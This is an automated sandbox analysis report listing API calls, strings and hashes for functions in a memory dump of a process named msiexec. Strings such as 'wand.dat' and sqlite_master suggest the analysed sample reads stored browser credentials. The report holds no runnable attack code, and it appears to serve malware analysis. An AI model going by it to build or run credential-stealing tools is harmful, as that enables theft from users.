                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                            • String ID: MS Sans Serif
                                                                                            • API String ID: 210187428-168460110
                                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName_wcsicmpmemset
                                                                                            • String ID: edit
                                                                                            • API String ID: 2747424523-2167791130
                                                                                            • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                            • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                            • API String ID: 3150196962-1506664499
                                                                                            • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                            • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 3384217055-0
                                                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 368790112-0
                                                                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                            APIs
                                                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                            • String ID:
                                                                                            • API String ID: 1889144086-0
                                                                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                            APIs
                                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                            • String ID:
                                                                                            • API String ID: 1661045500-0
                                                                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                            APIs
                                                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                            Strings
                                                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                            • API String ID: 1297977491-2063813899
                                                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040560C
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                            • String ID: *.*$dat$wand.dat
                                                                                            • API String ID: 2618321458-1828844352
                                                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                            APIs
                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                            • wcslen.MSVCRT ref: 00410C74
                                                                                            • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1549203181-0
                                                                                            • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                            • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00412057
                                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3550944819-0
                                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                            APIs
                                                                                            • free.MSVCRT ref: 0040F561
                                                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$free
                                                                                            • String ID: g4@
                                                                                            • API String ID: 2888793982-2133833424
                                                                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: @
                                                                                            • API String ID: 3510742995-2766056989
                                                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                            • memset.MSVCRT ref: 0040AF18
                                                                                            • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@memcpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 1865533344-0
                                                                                            • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                            • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004144E7
                                                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                            • memset.MSVCRT ref: 0041451A
                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 1127616056-0
                                                                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                            • memset.MSVCRT ref: 0042FED3
                                                                                            • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: sqlite_master
                                                                                            • API String ID: 438689982-3163232059
                                                                                            • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                            • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                            APIs
                                                                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                            • wcscpy.MSVCRT ref: 00414DF3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3917621476-0
                                                                                            • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                            • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                            APIs
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                            • _snwprintf.MSVCRT ref: 00410FE1
                                                                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            • _snwprintf.MSVCRT ref: 0041100C
                                                                                            • wcscat.MSVCRT ref: 0041101F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 822687973-0
                                                                                            • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                            • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                            APIs
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                            • malloc.MSVCRT ref: 00417459
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                            • free.MSVCRT ref: 0041747F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2605342592-0
                                                                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2678498856-0
                                                                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Item
                                                                                            • String ID:
                                                                                            • API String ID: 3888421826-0
                                                                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00417B7B
                                                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
